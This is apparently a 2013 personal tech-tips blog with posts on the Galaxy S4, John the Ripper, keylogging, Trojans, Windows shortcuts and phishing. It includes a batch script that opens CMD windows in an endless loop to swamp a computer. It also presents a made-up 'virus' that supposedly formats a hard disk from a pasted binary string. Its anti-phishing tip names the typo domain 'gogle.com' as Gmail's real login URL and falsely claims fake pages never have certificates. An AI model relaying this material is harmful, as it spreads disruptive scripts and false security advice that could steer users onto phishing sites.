Sunday 28 April 2013

Samsung Galaxy S4 Launched in India for Rs 41,500

The Samsung Galaxy S4 launched in India today, for a price of Rs 41,500, which is very close to the indian price of it’s main rival, the HTC One.



The Galaxy S4 continues Samsung’s tradition of packing a big screen and a ton of high-end internals in a glossy plastic body accompanied by a front button array that dates back to Android 2.3, with a 5-inch 1080p Super AMOLED display with super-sensitive touch, a 13-megapixel rear-facing camera, 2GB of RAM, 16GB of internal storage (with 32GB and 64GB variants), a user-replaceable 2600mAh battery, a microSD card slot and the usual suspects: Bluetooth 4.0, MHL, WiFi and an IR transmitter. The device runs Android 4.2 Jelly Bean.

The Indian Galaxy S4 features an Exynos 5 Octa chipset (that’s an 8-core CPU with 4 cores clocked at 1.2GHz and another 4 cores clocked at 1.8GHz), instead of the Qualcomm Snapdragon 600 version with LTE that’s sold in Singapore and Australia.

Available in stores from this weekend, available at Samsung India’s e-store from 26/04/2013.
Watch videos here:





Password Cracking:John The Ripper

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (eleven architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

TYPES OF ATTACKS

  • One of the modes John can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the encrypted hashes.
  • John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and then comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it does take a long time to run.



Wednesday 24 April 2013

The Best Chrome Features That You Should Check Out!!!

This is a crazy experimental feature in Chrome Browser.
Just type chrome://flags in the URL bar in Chrome and you will get a crazy list of things that you can do with your browser.

What Is Shoulder Surfing??



You all must have heard of internet surfing, channel surfing, wave surfing but have you ever heard of Shoulder Surfing???
Well shoulder surfing refers to using direct observation techniques, such as looking over someone's shoulder, to get information. It is commonly used to obtain passwords,PINs, security codes, and similar data.




A survey of IT professionals found that:
  • 85% of those surveyed admitted to seeing sensitive information on screen that they were not authorised to see
  • 82% admitted that it was possible information on their screens could have been viewed by unauthorised personnel
  • 82% had little or no confidence that users in their organisation would protect their screen from being viewed by unauthorised people.







Keystroke Logging

Keystroke logging, often referred to as keylogging, is the action of recording the keys struck on a keyboard, so that the person using the keyboard is unaware that their actions are being monitored. It also has very legitimate uses in studies of human-computer interaction. There are numerous keylogging methods, ranging from hardware and software-based approaches to acoustic analysis.

There are many counter measures for key logging such as One Time Passwords (OTP's), Anti Keylogger Softwares etc. For more information on this topic click on the above link.

Red Screen Of Death!!!


The Red Screen of Death, or occasionally The Red Screen of Doom (abbreviated RSOD) is another kind of error message. It existed in some beta versions (specifically Build 5048) of Microsoft's operating system Windows Vista. It is interesting to note that execution is incorrectly spelled "exectuion."



Trojan Horses


A Trojan horse, or Trojan, is a non-self-replicating type of malware which appears to perform a desirable function but instead drops a malicious payload, often including a backdoor allowing unauthorized access to the target's computer. These backdoors tend to be invisible to average users. Trojans do not attempt to inject themselves into other files like a computer virus. Trojan horses may steal information, or harm their host computer systems. Trojans may use drive-by downloads or install via online games or internet-driven applications in order to reach target computers. The term is derived from the Trojan Horse story in Greek mythology because Trojan horses employ a form of “social engineering,” presenting themselves as harmless, useful gifts, in order to persuade victims to install them on their computers.
Some operations performed by Trojan Horses are as follows:
  • Modification or deletion of files
  • Keystroke logging
  • Watching the user's screen
  • Viewing the user's webcam
  • Controlling the computer system remotely
  • Anonymizing remote third-party internet viewing









Task Manager

In this post I will show you the different ways to open task manager in Windows.


There are three different ways to open Task Manager in Windows OS.
  1. The most common way, which is used by most of us is, using Ctrl + Alt + Delete. This opens a  new window from where we start the Task Manager.
  2. The second method is by right clicking on the taskbar and clicking on the Task Manager option on the pop-up menu which opens up.
  3. This is a very rare and mostly unknown method. This is a direct short-cut. We can open task manager by using Ctrl + Shift + Esc.
Have Fun and subscribe if you like this post.

Open Infinite CMD Windows.

Disclaimer: This is only for educational purpose. Try it at your own risk.




Go to notepad and type the following code:

:start
Start
goto start

Save this as cmd.bat. Running this will open multiple CMD windows in your computer.
To close this file use Task Manager.

Sunday 21 April 2013

A Cool New Shortcut In Windows 7



Normally for switching between open items we use Alt + Tab. I accidently discovered this cool shortcut while working on Word.
The new shortcut I discovered is Windows Logo + Tab.

If you like this post then please subscribe for more cool tricks on your computer.

Sunday 14 April 2013

Keyboard Shortcuts Using Windows Logo

Theses are a few keyboard shortcuts using the windows logo key on the keyboard.



1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restorethe minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)

Format Hard Disk Using Virus


Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.


1.Go to notepad and paste the following code;

01001011000111110010010101010101010000011111100000 

2.Save this as format.exe
3.Done. Opening this file will format your hard disk.

Saturday 13 April 2013

Check Your Anti-Virus

This is a trick to find out whether your anti-virus is working properly or not.
We create a harmless virus on the computer and if your anti-virus does not detect it then it is not working properly.


1. Go to notepad and paste the following code.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-
FILE!$H+H*

2. Save this file as av.exe
3. Now run this file. If your antivirus detects it then it is working properly.

NOTE: This will not work on 64-bit computers.

Friday 12 April 2013

Matrix Effect II

This is another version of the post on Matrix Effect On Your Computer on my blog.
Its up to you which one is more cool.


1.Open Notepad and paste the code
@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a

Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A

2. Save this as b.bat
3. Now open this file.
4. Now you decide which one is better.

Wednesday 10 April 2013

Enable God Mode In Windows 7


What is God Mode in Widows?
 GodMode is actually a shortcut to accessing the operating system's various control settings.

  1. Create a new folder on your Desktop.
  2. Rename the folder as GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  3. Double click on this folder and you will have access to all your OS settings.

Tuesday 9 April 2013

Prevention Against Phishing


1.Never click on any link which came from an unknown sender saying to click here, click or click there!

2.If you clicked on a link and if you get redirected to a login page, then do these steps,

-Check the url, if its a login page of gmail, then the url should look like this http://www.gogle.com/account/xxxxxx
but, if url is different, then never login, its clearly a phishing page!

-When you open that type of page, dont forgot to see the certificate of that page, because a fake page never carry a certificate
To view a site certificate click on the logo before the url (It is a LOCK in case of Chrome)
 

Tuesday 2 April 2013

Haunted Google


Are you bored of using Google as your search engine. Well try out this cool and amazing search engine
Google Gothic

Phishing


Phishing is the act of attempting to acquire information such as usernames, passswords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communications. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users.

In my next post I will teach you how to protect yourself from phishing.